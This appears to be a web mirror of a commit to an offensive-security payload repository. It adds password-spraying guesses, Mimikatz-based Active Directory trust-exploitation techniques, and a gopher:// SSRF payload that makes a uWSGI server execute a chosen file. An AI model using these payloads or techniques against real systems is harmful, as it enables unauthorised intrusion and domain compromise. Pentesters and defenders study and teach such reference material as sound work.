mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 06:42:47 +00:00
SSRF exploiting WSGI
This commit is contained in:
parent
3a9b9529cb
commit
71171fa78b
2 changed files with 52 additions and 4 deletions
|
@ -540,10 +540,10 @@ Password spraying refers to the attack method that takes a large number of usern
|
|||
|
||||
Most of the time the best passwords to spray are :
|
||||
|
||||
- Password123
|
||||
- Welcome1
|
||||
- Password123, mimikatz
|
||||
- Welcome1/Welcome01
|
||||
- $Companyname1 : $Microsoft1
|
||||
- SeasonYear : Winter2019*
|
||||
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
|
||||
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
|
||||
|
||||
#### Kerberos pre-auth bruteforcing
|
||||
|
@ -1033,6 +1033,17 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
|
|||
|
||||
### Trust relationship between domains
|
||||
|
||||
* One-way
|
||||
* Domain B trusts A
|
||||
* Users in Domain A can access resources in Domain B
|
||||
* Users in Domain B cannot access resources in Domain A
|
||||
* Two-way
|
||||
* Domain A trusts Domain B
|
||||
* Domain B trusts Domain A
|
||||
* Authentication requests can be passed between the two domains in both directions
|
||||
|
||||
#### Enumerate trusts between domains
|
||||
|
||||
```powershell
|
||||
nltest /trusted_domains
|
||||
```
|
||||
|
@ -1047,6 +1058,19 @@ SourceName TargetName TrustType TrustDirection
|
|||
domainA.local domainB.local TreeRoot Bidirectional
|
||||
```
|
||||
|
||||
#### Exploit trusts between domains
|
||||
|
||||
:warning: Require a Domain-Admin level access to the current domain.
|
||||
|
||||
| Source | Target | Technique to use | Trust relationship |
|
||||
|---|---|---|---|
|
||||
| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) |
|
||||
| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) |
|
||||
| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) |
|
||||
| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) |
|
||||
|
||||
|
||||
|
||||
### Child Domain to Forest Compromise - SID Hijacking
|
||||
|
||||
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
|
||||
|
@ -1499,3 +1523,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
|||
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
||||
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
|
||||
* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
|
|
@ -29,6 +29,7 @@
|
|||
* [ldap://](#ldap)
|
||||
* [gopher://](#gopher)
|
||||
* [netdoc://](#netdoc)
|
||||
* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
|
||||
* [SSRF to XSS](#ssrf-to-xss)
|
||||
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||
|
@ -355,6 +356,28 @@ Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
|
|||
ssrf.php?url=gopher://127.0.0.1:4242/DATA
|
||||
```
|
||||
|
||||
## SSRF exploiting WSGI
|
||||
|
||||
Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.
|
||||
|
||||
```powershell
|
||||
gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
|
||||
```
|
||||
|
||||
| Header | | |
|
||||
|-----------|-----------|-------------|
|
||||
| modifier1 | (1 byte) | 0 (%00) |
|
||||
| datasize | (2 bytes) | 26 (%1A%00) |
|
||||
| modifier2 | (1 byte) | 0 (%00) |
|
||||
|
||||
| Variable (UWSGI_FILE) | | | | |
|
||||
|-----------------------|-----------|----|------------|---|
|
||||
| key length | (2 bytes) | 10 | (%0A%00) | |
|
||||
| key data | (m bytes) | | UWSGI_FILE | |
|
||||
| value length | (2 bytes) | 12 | (%0C%00) | |
|
||||
| value data | (n bytes) | | /tmp/test.py | |
|
||||
|
||||
|
||||
## SSRF to XSS
|
||||
|
||||
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||
|
|
Loading…
Reference in a new issue